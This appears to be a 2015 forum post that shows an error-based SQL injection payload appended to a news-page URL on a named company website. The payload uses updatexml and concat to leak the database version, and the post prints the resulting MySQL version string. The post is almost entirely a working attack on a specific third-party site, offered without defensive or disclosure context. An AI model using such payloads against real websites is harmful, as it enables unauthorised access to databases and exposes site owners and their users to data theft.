16.02.2015, 16:08
Code:
http://www.aaa-agro.com/news/536.html'*updatexml(1,concat(0x3A,version()),1)*'

Output is in the alert

5.5.41-0ubuntu0.12.04